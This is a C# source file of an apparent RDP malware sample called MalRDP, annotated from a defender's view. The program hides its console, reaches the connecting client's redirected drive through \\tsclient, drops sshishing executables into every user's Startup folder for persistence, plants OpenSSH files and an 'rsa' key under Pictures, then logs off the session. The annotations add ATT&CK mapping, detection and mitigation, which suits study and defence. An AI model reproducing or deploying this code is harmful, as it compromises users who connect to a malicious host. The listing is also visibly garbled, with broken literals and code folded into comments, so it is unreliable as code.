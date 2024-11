using System ;

using System. Collections. Generic ;

using System. IO ;

using System. Linq ;

using System. Runtime. InteropServices ;

using System. Threading. Tasks ;

using System. Windows. Forms ;

namespace MalRDP

{

/// <summary>
/// Console program of the MalRDP sample. <c>Main</c> hides its console window, lists the user
/// profile directories under the <c>\\tsclient</c> C-drive path (the RDP client's redirected
/// local drive as seen from inside a remote session), copies files staged under
/// <c>C:\Netlogon</c> into each profile's Startup and Pictures folders, and then logs off the
/// current session.
/// </summary>
// NOTE(review): presumably launched at session start on the RDP host; nothing in this file shows
// how it is started - confirm against the deployment that ships it.
// NOTE(review): this listing is extraction-mangled (stray spaces inside string literals, code
// folded into `//` comment lines, `& &` operators) and does not compile as printed. The code is
// therefore left untouched and only annotated.
//
// Defender view of what the code below does:
//  - Impact lands on the machine that CONNECTED to this RDP host with drive redirection enabled,
//    not on the host itself.
//  - Files copied into "...\Start Menu\Programs\Startup" run at that user's next logon
//    (MITRE ATT&CK T1547.001, Startup Folder).
//  - Artefacts named on this page: sshishing.exe and sshishing2.exe in the Startup folder, an
//    "OpenSSH Win64" directory and an "rsa" file under the profile's Pictures folder.
//  - Detection: on the client endpoint, file-creation events in a Startup folder whose writing
//    process is the Remote Desktop client (mstsc.exe), and the Pictures artefacts above.
//  - Mitigation: do not redirect local drives to hosts you do not control (the "drivestoredirect"
//    setting in .rdp files / the Local Resources options of the client), and treat unsolicited
//    .rdp files as untrusted.
class Program

{

// Logs off a Remote Desktop Services session (imported from wtsapi32; SetLastError is requested
// but the return value is not checked anywhere in this file).
[ DllImport ( "wtsapi32. dll" , SetLastError = true ) ]

static extern bool WTSLogoffSession ( IntPtr hServer , int sessionId , bool bWait ) ;

// Returns the window handle of the console attached to this process.
[ DllImport ( "kernel32. dll" ) ]

static extern IntPtr GetConsoleWindow () ;

// Changes the show state of a window; used in Main with SW_HIDE to hide the console.
[ DllImport ( "user32. dll" ) ]

static extern bool ShowWindow ( IntPtr hWnd , int nCmdShow ) ;

// nCmdShow value passed to ShowWindow to hide the window.
const int SW_HIDE = 0 ;

// Session id passed to WTSLogoffSession to mean "the session this process runs in".
const int WTS_CURRENT_SESSION = - 1 ;

// Server handle passed to WTSLogoffSession to mean "the local RD Session Host".
static readonly IntPtr WTS_CURRENT_SERVER_HANDLE = IntPtr . Zero ;

/// <summary>
/// Recursively copies the files and subdirectories of <paramref name="sourceDir"/> into
/// <paramref name="destDir"/>, printing one line per copied file.
/// </summary>
/// <param name="sourceDir">Directory to copy from.</param>
/// <param name="destDir">Directory to copy into.</param>
/// <exception cref="DirectoryNotFoundException">Thrown when the source directory does not exist.</exception>
// NOTE(review): in this listing three statements appear inside `//` comment lines (the `dir`
// declaration, the destination-exists check and the subdirectory loop header) - looks like an
// extraction artefact; the method does not compile as printed.
static void CopyDirectory ( string sourceDir , string destDir ) {

// Get the subdirectories for the specified directory. DirectoryInfo dir = new DirectoryInfo( sourceDir) ;

if ( ! dir . Exists )

{

throw new DirectoryNotFoundException (

"Source directory does not exist or could not be found: " + sourceDir ) ;

}

// If the destination directory doesn't exist, create it. if ( !Directory. Exists( destDir) )

{

Directory . CreateDirectory ( destDir ) ;

}

// Get the files in the directory and copy them to the new location.

FileInfo [ ] files = dir . GetFiles () ;

foreach ( FileInfo file in files )

{

// overwrite == false: an existing file at the destination makes CopyTo throw instead of being replaced.
string tempPath = Path . Combine ( destDir , file . Name ) ; file . CopyTo ( tempPath , false ) ;

// Progress output goes to the console, which Main hides before any copy runs.
Console . WriteLine ( $"Copied { file . FullName } to { tempPath } " ) ;

}

// Copy subdirectories and their contents recursively. DirectoryInfo[] dirs = dir. GetDirectories(); foreach ( DirectoryInfo subdir in dirs)

{

string tempPath = Path . Combine ( destDir , subdir . Name ) ; CopyDirectory ( subdir . FullName , tempPath ) ; }

}

/// <summary>
/// Hides the console, enumerates the profile directories on the client's redirected drive,
/// copies the staged files into each one, and logs off the current session.
/// </summary>
/// <param name="args">Command-line arguments; not read.</param>
static void Main ( string [ ] args )

{

// Hide the console window so nothing is shown in the session.
var handle = GetConsoleWindow () ;

ShowWindow ( handle , SW_HIDE ) ;

int retry = 0 ;

string [ ] user_directories = {} ;

// Up to 10 attempts, 500 ms apart, to list the profile directories. Presumably this waits for
// the redirected drive to become available after logon - TODO confirm. If every attempt fails
// the array stays empty and the copy loop below does nothing.
while ( retry < 10 )

{

try

{

user_directories =

Directory . GetDirectories ( @"\\ tsclient\ C\ Users" ) ;

break ;

}

catch {

// Every exception type is swallowed here; the loop just sleeps and tries again.
}

System . Threading . Thread . Sleep ( 500 ) ;

retry ++;

}

// Source paths on the machine this program runs on: two executables, an OpenSSH directory and
// a file named "rsa" (by its name and the variable name, an SSH key - not verifiable from here).
string dropperInPath = @"C:\ Netlogon\ sshishing2. exe" ; string sshingInPath = @"C:\ Netlogon\ sshishing. exe" ; string sshInDirPath = @"C:\ Netlogon\ OpenSSH-Win64" ; string sshKeyInPath = @"C:\ Netlogon\ rsa" ;

foreach ( string dir in user_directories ) {

// Skip the built-in profile directories. This is a suffix match, so any profile whose name
// merely ends with one of these strings is skipped as well.
if ( dir . EndsWith ( "Default" ) || dir . EndsWith ( "Default User" ) || dir . EndsWith ( "Public" ) || dir . EndsWith ( "All Users" ) ) continue ;

try

{

// Destinations inside the client-side profile: both executables go to the per-user Startup
// folder, the OpenSSH directory and the "rsa" file go under Pictures.
// NOTE(review): the verbatim strings below contain line breaks and spaces as printed -
// most likely extraction artefacts rather than the author's literals.
string dropperOutPath = $@"

{ dir } \ AppData\ Roaming\ Microsoft\ Windows\ Start

Menu\ Programs\ Startup\ sshishing2. exe" ;

string sshingOutPath = $@"

{ dir } \ AppData\ Roaming\ Microsoft\ Windows\ Start

Menu\ Programs\ Startup\ sshishing. exe" ;

string sshOutDirPath = $@" { dir } \ Pictures\ OpenSSH Win64" ;

// Each copy below runs only when the source exists and the destination does not, so files
// already present in a profile are never overwritten.
string sshKeyOutPath = $@" { dir } \ Pictures\ rsa" ; if ( File . Exists ( dropperInPath ) & &

! File . Exists ( dropperOutPath ) )

{

File . Copy ( dropperInPath , dropperOutPath ) ; }

if ( File . Exists ( sshingInPath ) & &

! File . Exists ( sshingOutPath ) )

{

File . Copy ( sshingInPath , sshingOutPath ) ; }

if ( File . Exists ( sshKeyInPath ) & &

! File . Exists ( sshKeyOutPath ) )

{

File . Copy ( sshKeyInPath , sshKeyOutPath ) ; }

if ( Directory . Exists ( sshInDirPath ) & & ! Directory . Exists ( sshOutDirPath ) )

{

CopyDirectory ( sshInDirPath , sshOutDirPath ) ; }

}

// Any failure for one profile is swallowed (e is unused) and the loop moves to the next profile;
// nothing is logged.
catch ( Exception e )

{

}

}

// End the current session on the local server without waiting (bWait == false). The connecting
// user therefore sees the session close right after the copies; the return value is ignored.
WTSLogoffSession ( WTS_CURRENT_SERVER_HANDLE ,

WTS_CURRENT_SESSION , false ) ;

}

}